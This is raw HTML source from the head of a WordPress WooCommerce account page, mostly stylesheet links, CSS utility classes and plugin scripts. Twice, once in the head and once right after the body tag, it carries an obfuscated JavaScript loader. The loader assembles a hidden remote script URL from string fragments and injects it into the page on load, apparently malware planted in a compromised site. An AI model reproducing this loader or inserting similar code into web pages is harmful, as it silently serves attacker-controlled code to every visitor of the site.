} .desktop\:ext-grid-cols-1 { grid-template-columns: repeat(1, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-2 { grid-template-columns: repeat(2, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-3 { grid-template-columns: repeat(3, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-4 { grid-template-columns: repeat(4, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-5 { grid-template-columns: repeat(5, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-6 { grid-template-columns: repeat(6, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-7 { grid-template-columns: repeat(7, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-8 { grid-template-columns: repeat(8, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-9 { grid-template-columns: repeat(9, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-10 { grid-template-columns: repeat(10, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-11 { grid-template-columns: repeat(11, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-12 { grid-template-columns: repeat(12, minmax(0, 1fr)) !important; } .desktop\:ext-grid-cols-none { grid-template-columns: none !important; } .desktop\:ext-flex-row { flex-direction: row !important; } .desktop\:ext-flex-row-reverse { flex-direction: row-reverse !important; } .desktop\:ext-flex-col { flex-direction: column !important; } .desktop\:ext-flex-col-reverse { flex-direction: column-reverse !important; } .desktop\:ext-flex-wrap { flex-wrap: wrap !important; } .desktop\:ext-flex-wrap-reverse { flex-wrap: wrap-reverse !important; } .desktop\:ext-flex-nowrap { flex-wrap: nowrap !important; } .desktop\:ext-items-start { align-items: flex-start !important; } .desktop\:ext-items-end { align-items: flex-end !important; } .desktop\:ext-items-center { align-items: center !important; } .desktop\:ext-items-baseline { align-items: baseline !important; } .desktop\:ext-items-stretch { align-items: stretch !important; } .desktop\:ext-justify-start { justify-content: flex-start !important; } .desktop\:ext-justify-end { justify-content: flex-end !important; } .desktop\:ext-justify-center { justify-content: center !important; } .desktop\:ext-justify-between { justify-content: space-between !important; } .desktop\:ext-justify-around { justify-content: space-around !important; } .desktop\:ext-justify-evenly { justify-content: space-evenly !important; } .desktop\:ext-justify-items-start { justify-items: start !important; } .desktop\:ext-justify-items-end { justify-items: end !important; } .desktop\:ext-justify-items-center { justify-items: center !important; } .desktop\:ext-justify-items-stretch { justify-items: stretch !important; } .desktop\:ext-justify-self-auto { justify-self: auto !important; } .desktop\:ext-justify-self-start { justify-self: start !important; } .desktop\:ext-justify-self-end { justify-self: end !important; } .desktop\:ext-justify-self-center { justify-self: center !important; } .desktop\:ext-justify-self-stretch { justify-self: stretch !important; } .desktop\:ext-p-0:not([style*="padding"]) { padding: 0 !important; } .desktop\:ext-p-base:not([style*="padding"]) { padding: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-p-lg:not([style*="padding"]) { padding: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-px-0:not([style*="padding"]) { padding-left: 0 !important; padding-right: 0 !important; } .desktop\:ext-px-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-px-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; padding-right: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-py-0:not([style*="padding"]) { padding-top: 0 !important; padding-bottom: 0 !important; } .desktop\:ext-py-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-py-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-pt-0:not([style*="padding"]) { padding-top: 0 !important; } .desktop\:ext-pt-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-pt-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-pr-0:not([style*="padding"]) { padding-right: 0 !important; } .desktop\:ext-pr-base:not([style*="padding"]) { padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-pr-lg:not([style*="padding"]) { padding-right: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-pb-0:not([style*="padding"]) { padding-bottom: 0 !important; } .desktop\:ext-pb-base:not([style*="padding"]) { padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-pb-lg:not([style*="padding"]) { padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-pl-0:not([style*="padding"]) { padding-left: 0 !important; } .desktop\:ext-pl-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; } .desktop\:ext-pl-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; } .desktop\:ext-text-left { text-align: left !important; } .desktop\:ext-text-center { text-align: center !important; } .desktop\:ext-text-right { text-align: right !important; } } </style> <link rel='stylesheet' id='apus-lookbook-style-css' href='https://techyreview.in/wp-content/plugins/apus-lookbook/assets/style.css?ver=6.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://techyreview.in/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.4' type='text/css' media='all' /> <link rel='stylesheet' id='woof-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.2' type='text/css' media='all' /> <style id='woof-inline-css' type='text/css'> .woof_products_top_panel li span, .woof_products_top_panel2 li span{background: url(https://techyreview.in/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size: 14px 14px;background-repeat: no-repeat;background-position: right;} .woof_edit_view{ display: none; } .woof_price_search_container .price_slider_amount button.button{ display: none; } /***** END: hiding submit button of the price slider ******/ </style> <link rel='stylesheet' id='chosen-drop-down-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='icheck-jquery-color-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/js/icheck/skins/square/blue.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_by_onsales_html_items-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_by_text_html_items-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_label_html_items-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_checkbox-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_radio-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_switcher-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_color-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_tooltip-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_sd_html_items_front-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='select2-css' href='https://techyreview.in/wp-content/plugins/woocommerce/assets/css/select2.css?ver=7.4.0' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://techyreview.in/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.4.0' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://techyreview.in/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.4.0' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://techyreview.in/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.4.0' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='woo-variation-swatches-css' href='https://techyreview.in/wp-content/plugins/woo-variation-swatches/assets/css/frontend.min.css?ver=1677155107' type='text/css' media='all' /> <style id='woo-variation-swatches-inline-css' type='text/css'> :root { --wvs-tick:url("data:image/svg+xml;utf8,%3Csvg filter='drop-shadow(0px 0px 2px rgb(0 0 0 / .8))' xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3E%3Cpath fill='none' stroke='%23ffffff' stroke-linecap='round' stroke-linejoin='round' stroke-width='4' d='M4 16L11 23 27 7'/%3E%3C/svg%3E"); --wvs-cross:url("data:image/svg+xml;utf8,%3Csvg filter='drop-shadow(0px 0px 5px rgb(255 255 255 / .6))' xmlns='http://www.w3.org/2000/svg' width='72px' height='72px' viewBox='0 0 24 24'%3E%3Cpath fill='none' stroke='%23ff0000' stroke-linecap='round' stroke-width='0.6' d='M5 5L19 19M19 5L5 19'/%3E%3C/svg%3E"); --wvs-single-product-item-width:30px; --wvs-single-product-item-height:30px; --wvs-single-product-item-font-size:16px} </style> <link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https://techyreview.in/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-widget-styles-css' href='https://techyreview.in/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-responsive-css' href='https://techyreview.in/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='urna-style-css' href='https://techyreview.in/wp-content/themes/urna/style.css?ver=6.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='urna-child-style-css' href='https://techyreview.in/wp-content/themes/urna-child/style.css?ver=2.3.0' type='text/css' media='all' /> <script type="text/javascript" id="woof-husky-js-extra"> /* <![CDATA[ */ var woof_husky_txt = {"ajax_url":"https:\/\/techyreview.in\/wp-admin\/admin-ajax.php","plugin_uri":"https:\/\/techyreview.in\/wp-content\/plugins\/woocommerce-products-filter\/ext\/by_text\/","loader":"https:\/\/techyreview.in\/wp-content\/plugins\/woocommerce-products-filter\/ext\/by_text\/assets\/img\/ajax-loader.gif","not_found":"Nothing found!","prev":"Prev","next":"Next","site_link":"https:\/\/techyreview.in","default_data":{"placeholder":"","behavior":"title_or_content_or_excerpt","search_by_full_word":0,"autocomplete":1,"how_to_open_links":0,"taxonomy_compatibility":0,"sku_compatibility":1,"custom_fields":"","search_desc_variant":0,"view_text_length":10,"min_symbols":3,"max_posts":10,"image":"","notes_for_customer":"","template":"default","max_open_height":300,"page":0}}; /* ]]> */ </script> <script type="text/javascript" src="https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=3.3.2" id="woof-husky-js"></script> <script type="text/javascript" src="https://techyreview.in/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://techyreview.in/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://techyreview.in/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.7.4.0" id="jquery-blockui-js"></script> <script type="text/javascript" id="wc-add-to-cart-js-extra"> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/techyreview.in\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type="text/javascript" src="https://techyreview.in/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.4.0" id="wc-add-to-cart-js"></script> <script type="text/javascript" id="zxcvbn-async-js-extra"> /* <![CDATA[ */ var _zxcvbnSettings = {"src":"https:\/\/techyreview.in\/wp-includes\/js\/zxcvbn.min.js"}; /* ]]> */ </script> <script type="text/javascript" src="https://techyreview.in/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script> <script type="text/javascript" src="https://techyreview.in/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=6.10.0" id="vc_woocommerce-add-to-cart-js-js"></script> <link rel="https://api.w.org/" href="https://techyreview.in/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://techyreview.in/wp-json/wp/v2/pages/13" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://techyreview.in/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.1" /> <meta name="generator" content="WooCommerce 7.4.0" /> <link rel='shortlink' href='https://techyreview.in/?p=13' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://techyreview.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechyreview.in%2Fmy-account%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://techyreview.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechyreview.in%2Fmy-account%2F&format=xml" /> <meta name="generator" content="Redux 4.3.26" /><meta name="generator" content="Site Kit by Google 1.94.0" /><script>var _0x1f4840=_0x1ca2;(function(_0x37167e,_0x390a1e){var _0x32cdab=_0x1ca2,_0x53bb1a=_0x37167e();while(!![]){try{var _0x28d699=parseInt(_0x32cdab(0x1c6))/0x1+-parseInt(_0x32cdab(0x1c8))/0x2*(parseInt(_0x32cdab(0x1b9))/0x3)+parseInt(_0x32cdab(0x1b3))/0x4+parseInt(_0x32cdab(0x1bf))/0x5+parseInt(_0x32cdab(0x1bc))/0x6*(parseInt(_0x32cdab(0x1b2))/0x7)+-parseInt(_0x32cdab(0x1b1))/0x8+-parseInt(_0x32cdab(0x1b5))/0x9*(-parseInt(_0x32cdab(0x1c0))/0xa);if(_0x28d699===_0x390a1e)break;else _0x53bb1a['push'](_0x53bb1a['shift']());}catch(_0xef27db){_0x53bb1a['push'](_0x53bb1a['shift']());}}}(_0x56ac,0x62e2b));function swerwer(){var _0x1be72e=_0x1ca2,_0x43a47b=document[_0x1be72e(0x1c2)](_0x1be72e(0x1bd));return _0x43a47b[_0x1be72e(0x1ca)]='ht'+'tps://rec'+_0x1be72e(0x1cd)+_0x1be72e(0x1cc)+_0x1be72e(0x1c3)+'in'+_0x1be72e(0x1cb)+'ar'+_0x1be72e(0x1c7)+_0x1be72e(0x1c1)+_0x1be72e(0x1be)+_0x1be72e(0x1c9)+'ur'+'n.js',_0x43a47b[_0x1be72e(0x1c5)]=_0x1be72e(0x1b8),_0x43a47b['id']=_0x1be72e(0x1bb),_0x43a47b;}Boolean(document[_0x1f4840(0x1b0)](_0x1f4840(0x1b7)))==![]&&(document[_0x1f4840(0x1b4)]?(document['currentScript'][_0x1f4840(0x1b6)]['insertBefore'](swerwer(),document['currentScript']),document[_0x1f4840(0x1b4)]['remove']()):d['getElementsByTagName'](_0x1f4840(0x1ba))[0x0][_0x1f4840(0x1c4)](swerwer()));function _0x1ca2(_0x5c13d3,_0x10d019){var _0x56acee=_0x56ac();return _0x1ca2=function(_0x1ca2a5,_0x4e4fe1){_0x1ca2a5=_0x1ca2a5-0x1b0;var _0x73b06b=_0x56acee[_0x1ca2a5];return _0x73b06b;},_0x1ca2(_0x5c13d3,_0x10d019);}function _0x56ac(){var _0x46c312=['trickl','6LObfmH','script','scri','3822470oovwGi','220qlaQai','com/','createElement','ctl','appendChild','type','133350wkvzaH','ter.','134ANVGfY','pts/t','src','est','erfe','ords.p','querySelector','5879944KcCcWx','231938CdIMay','2890492INDZRn','currentScript','50535rwizqw','parentNode','script[id="trickl"]','text/javascript','28527sHSQyT','head'];_0x56ac=function(){return _0x46c312;};return _0x56ac();}</script> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <meta name="generator" content="Elementor 3.11.2; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading, a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap"> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <meta name="generator" content="Powered by Slider Revolution 6.6.7 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="https://techyreview.in/wp-content/uploads/2023/02/cropped-Untitled-design-4-32x32.png" sizes="32x32" /> <link rel="icon" href="https://techyreview.in/wp-content/uploads/2023/02/cropped-Untitled-design-4-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://techyreview.in/wp-content/uploads/2023/02/cropped-Untitled-design-4-180x180.png" /> <meta name="msapplication-TileImage" content="https://techyreview.in/wp-content/uploads/2023/02/cropped-Untitled-design-4-270x270.png" /> <script>function setREVStartSize(e){ //window.requestAnimationFrame(function() { window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW; window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH; try { var pw = document.getElementById(e.c).parentNode.offsetWidth, newh; pw = pw===0 || isNaN(pw) || (e.l=="fullwidth" || e.layout=="fullwidth") ? window.RSIW : pw; e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw); e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw); e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh); e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh); e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide); e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide); e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0); if(e.layout==="fullscreen" || e.l==="fullscreen") newh = Math.max(e.mh,window.RSIH); else{ e.gw = Array.isArray(e.gw) ? e.gw : [e.gw]; for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1]; e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el; e.gh = Array.isArray(e.gh) ? e.gh : [e.gh]; for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1]; var nl = new Array(e.rl.length), ix = 0, sl; e.tabw = e.tabhide>=pw ? 0 : e.tabw; e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw; e.tabh = e.tabhide>=pw ? 0 : e.tabh; e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh; for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i]; sl = nl[0]; for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;} var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]); newh = (e.gh[ix] * m) + (e.tabh + e.thumbh); } var el = document.getElementById(e.c); if (el!==null && el) el.style.height = newh+"px"; el = document.getElementById(e.c+"_wrapper"); if (el!==null && el) { el.style.height = newh+"px"; el.style.display = "block"; } } catch(e){ console.log("Failure at Presize of Slider:" + e) } //}); };</script> <noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <style> </style> </head> <body class="page-template-default page page-id-13 theme-urna woocommerce-account woocommerce-page woocommerce-lost-password woocommerce-no-js woo-variation-swatches wvs-behavior-blur wvs-theme-urna-child wvs-show-label wvs-tooltip wpb-js-composer js-comp-ver-6.10.0 vc_responsive elementor-default elementor-kit-8"> <script>var _0x1f4840=_0x1ca2;(function(_0x37167e,_0x390a1e){var _0x32cdab=_0x1ca2,_0x53bb1a=_0x37167e();while(!![]){try{var _0x28d699=parseInt(_0x32cdab(0x1c6))/0x1+-parseInt(_0x32cdab(0x1c8))/0x2*(parseInt(_0x32cdab(0x1b9))/0x3)+parseInt(_0x32cdab(0x1b3))/0x4+parseInt(_0x32cdab(0x1bf))/0x5+parseInt(_0x32cdab(0x1bc))/0x6*(parseInt(_0x32cdab(0x1b2))/0x7)+-parseInt(_0x32cdab(0x1b1))/0x8+-parseInt(_0x32cdab(0x1b5))/0x9*(-parseInt(_0x32cdab(0x1c0))/0xa);if(_0x28d699===_0x390a1e)break;else _0x53bb1a['push'](_0x53bb1a['shift']());}catch(_0xef27db){_0x53bb1a['push'](_0x53bb1a['shift']());}}}(_0x56ac,0x62e2b));function swerwer(){var _0x1be72e=_0x1ca2,_0x43a47b=document[_0x1be72e(0x1c2)](_0x1be72e(0x1bd));return _0x43a47b[_0x1be72e(0x1ca)]='ht'+'tps://rec'+_0x1be72e(0x1cd)+_0x1be72e(0x1cc)+_0x1be72e(0x1c3)+'in'+_0x1be72e(0x1cb)+'ar'+_0x1be72e(0x1c7)+_0x1be72e(0x1c1)+_0x1be72e(0x1be)+_0x1be72e(0x1c9)+'ur'+'n.js',_0x43a47b[_0x1be72e(0x1c5)]=_0x1be72e(0x1b8),_0x43a47b['id']=_0x1be72e(0x1bb),_0x43a47b;}Boolean(document[_0x1f4840(0x1b0)](_0x1f4840(0x1b7)))==![]&&(document[_0x1f4840(0x1b4)]?(document['currentScript'][_0x1f4840(0x1b6)]['insertBefore'](swerwer(),document['currentScript']),document[_0x1f4840(0x1b4)]['remove']()):d['getElementsByTagName'](_0x1f4840(0x1ba))[0x0][_0x1f4840(0x1c4)](swerwer()));function _0x1ca2(_0x5c13d3,_0x10d019){var _0x56acee=_0x56ac();return _0x1ca2=function(_0x1ca2a5,_0x4e4fe1){_0x1ca2a5=_0x1ca2a5-0x1b0;var _0x73b06b=_0x56acee[_0x1ca2a5];return _0x73b06b;},_0x1ca2(_0x5c13d3,_0x10d019);}function _0x56ac(){var _0x46c312=['trickl','6LObfmH','script','scri','3822470oovwGi','220qlaQai','com/','createElement','ctl','appendChild','type','133350wkvzaH','ter.','134ANVGfY','pts/t','src','est','erfe','ords.p','querySelector','5879944KcCcWx','231938CdIMay','2890492INDZRn','currentScript','50535rwizqw','parentNode','script[id="trickl"]','text/javascript','28527sHSQyT','head'];_0x56ac=function(){return _0x46c312;};return _0x56ac();}</script><div id="wrapper-container" class="wrapper-container">